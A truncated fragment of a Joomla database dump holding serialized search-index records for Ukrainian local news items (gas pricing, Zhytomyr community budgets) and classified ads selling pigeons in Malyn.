\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:56:\"2519:richna-fiksovana-tsina-na-gaz-uzhe-vipravdovue-sebe\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:68:\"/8-novini-2/2519-richna-fiksovana-tsina-na-gaz-uzhe-vipravdovue-sebe\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2519\";s:5:\"route\";s:109:\"index.php?option=com_content&view=article&id=2519:richna-fiksovana-tsina-na-gaz-uzhe-vipravdovue-sebe&catid=8\";s:5:\"title\";s:89:\"Річна фіксована ціна на газ уже виправдовує себе\";s:11:\"description\";s:2649:\" Попри завершення опалювального сезону газ у Європі лише дорожчає. На таку незвичну для літа тенденцію впливають пожвавлення економіки, низькі запаси палива в сховищах, а також російський Газпром, який штучно створює дефіцит газу на європейському ринку, обмежуючи обсяги постачання. У середньому ціни на газ у Європі на початок червня сягали 25,9 євро/МВт-год, що трохи більше за $270 за тисячу кубометрів. Таким чином, ринкова ціна за кубометр газу в червні сягає майже 12 грн за кубометр. Проте ціну в майже 12 грн за кубометр споживачі не платитимуть! Адже як базова діє річна, фіксована ціна. У Нафтогазу вона складає 7,96 грн за кубометр. Річні ціни решти компаній коливаються від 7,80 грн до 13,50 грн за кубометр. Перелік усіх пропозицій можна переглянути в огляді ГазПравди: https://gazpravda.com.ua/novyny/vid-7-80-i-do-13-50-hrn-za-kubometr-postachalnyky-opryliudnyly-svizhi-tsinnyky-na-haz. Базова річна ціна зафіксована на рік і не змінюється навіть за умов підвищення цін на європейських хабах і сезонних коливань. Підключення ж до тарифного плану «Місячний» відбувається ЛИШЕ за бажанням клієнта. У даному випадку споживачам справді вигідно залишатися нарічних базових пропозиціях. Але вже в липні більшість компаній обіцяють презентувати свої сезонні та альтернативні річні продукти – наприклад, із рівними помісячними проплатами. ГазПравда вже чекає на різні, конкурентні пропозиції та підготує спеціальний огляд сезонних цін, аби споживачі могли обрати для себе найкращий варіант. https://gazpravda.com.ua/ \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-06-17 18:42:16\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-06-17 18:42:16\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4850,'index.php?option=com_content&view=article&id=2520','index.php?option=com_content&view=article&id=2520:vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-5-misyatsiv-2021-roku&catid=8','Виконання дохідної частини бюджетів ОТГ Житомирської області за 5 місяців 2021 року',' За даними Департаменту фінансів Житомирської ОДА. ','2021-06-17 21:48:47','ba10d372a0d83465fa1170cbe268a2a0',1,1,1,'*','2021-06-17 18:48:47','0000-00-00 00:00:00','2021-06-17 18:48:47','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2520\";s:5:\"alias\";s:92:\"vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-5-misyatsiv-2021-roku\";s:7:\"summary\";s:263:\"<p>За даними Департаменту фінансів Житомирської ОДА.<a class=\"modal\" href=\"https://malehus.in.ua/images/stories/censor.jpg\"><img src=\"https://malehus.in.ua/images/stories/censor.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-06-17 18:48:47\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:97:\"2520:vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-5-misyatsiv-2021-roku\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:109:\"/8-novini-2/2520-vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-5-misyatsiv-2021-roku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2520\";s:5:\"route\";s:150:\"index.php?option=com_content&view=article&id=2520:vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-5-misyatsiv-2021-roku&catid=8\";s:5:\"title\";s:150:\"Виконання дохідної частини бюджетів ОТГ Житомирської області за 5 місяців 2021 року\";s:11:\"description\";s:94:\" За даними Департаменту фінансів Житомирської ОДА. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-06-17 18:48:47\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-06-17 18:48:47\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4851,'index.php?option=com_content&view=article&id=2521','index.php?option=com_content&view=article&id=2521:molodi-poshtovi-gotovi-pominyati-propisku&catid=126','Молоді поштові готові поміняти прописку',' В наявності є птиця 21 року так і минулих років. Локація - м.Малин, Житомирської області. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч, Хмільник. Ціна 100, телефонуйте 0508320922, домовимось. ','2021-06-17 22:15:25','540ff4ca57d529b152b0febee0324ec5',1,1,1,'*','2021-06-17 19:15:25','0000-00-00 00:00:00','2021-06-17 19:15:25','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2521\";s:5:\"alias\";s:41:\"molodi-poshtovi-gotovi-pominyati-propisku\";s:7:\"summary\";s:1894:\"<!--StartFragment--><p><strong>В наявності є птиця 21 року так і минулих років. Локація - м.Малин, Житомирської області.</strong></p><p><strong>Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч, Хмільник. Ціна 100, телефонуйте 0508320922, домовимось.</strong></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gol_20210615_140144_1.jpg\"><img src=\"https://malehus.in.ua/images/stories/gol_20210615_140144_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a>&nbsp;<a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gol_20210615_140145_1.jpg\"><img src=\"https://malehus.in.ua/images/stories/gol_20210615_140145_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a>&nbsp;<a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gol_20210615_140146_1.jpg\"><img src=\"https://malehus.in.ua/images/stories/gol_20210615_140146_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a><strong><br></strong></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gol_20210615_140148_1.jpg\"><img src=\"https://malehus.in.ua/images/stories/gol_20210615_140148_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a>&nbsp;<a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gol_20210615_140149_1.jpg\"><img src=\"https://malehus.in.ua/images/stories/gol_20210615_140149_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gol_20210615_140143_1.jpg\"><img src=\"https://malehus.in.ua/images/stories/gol_20210615_140143_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a>&nbsp;<a class=\"modal\" href=\"https://malehus.in.ua/images/stories/gol_20210615_140150_1.jpg\"><img src=\"https://malehus.in.ua/images/stories/gol_20210615_140150_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a></p><!--EndFragment-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"126\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-06-17 19:15:25\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"Поштові\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:46:\"2521:molodi-poshtovi-gotovi-pominyati-propisku\";s:7:\"catslug\";s:12:\"126:poshtovi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:63:\"/holuby/poshtovi/2521-molodi-poshtovi-gotovi-pominyati-propisku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"Поштові\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Поштові\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2521\";s:5:\"route\";s:101:\"index.php?option=com_content&view=article&id=2521:molodi-poshtovi-gotovi-pominyati-propisku&catid=126\";s:5:\"title\";s:74:\"Молоді поштові готові поміняти прописку\";s:11:\"description\";s:387:\" В наявності є птиця 21 року так і минулих років. Локація - м.Малин, Житомирської області. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч, Хмільник. Ціна 100, телефонуйте 0508320922, домовимось. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-06-17 19:15:25\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-06-17 19:15:25\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4852,'index.php?option=com_content&view=article&id=2522','index.php?option=com_content&view=article&id=2522:shokoladna-parochka-pominyae-propisku&catid=127','Шоколадна парочка поміняє прописку',' Голуб 19 року та самочка 20 року, спаровані, Локація - м.Малин, Житомирської області. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч, Хмільник. Ціна 300 за одного, телефонуйте 0508320922, домовимось. ','2021-06-17 22:31:36','a2679152368a1c50c8de2a9de700c643',1,1,1,'*','2021-06-17 19:31:36','0000-00-00 00:00:00','2021-06-17 19:31:36','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2522\";s:5:\"alias\";s:37:\"shokoladna-parochka-pominyae-propisku\";s:7:\"summary\";s:1856:\"<p><strong>Голуб 19 року та самочка 20 року, спаровані,&nbsp;</strong></p><!--StartFragment--><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;\"><strong>Локація - м.Малин, Житомирської області.</strong></p><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;\"><strong>Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч, Хмільник. Ціна 300 за одного, телефонуйте 0508320922, домовимось.</strong></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/121212.jpg\"><img src=\"https://malehus.in.ua/images/stories/121212.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a><strong><br></strong></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/IMG_20210616_181613.jpg\"><img src=\"https://malehus.in.ua/images/stories/IMG_20210616_181613.jpg\" alt=\"\" class=\"fr-fin\" width=\"549\"></a><br></p><!--EndFragment-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"127\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-06-17 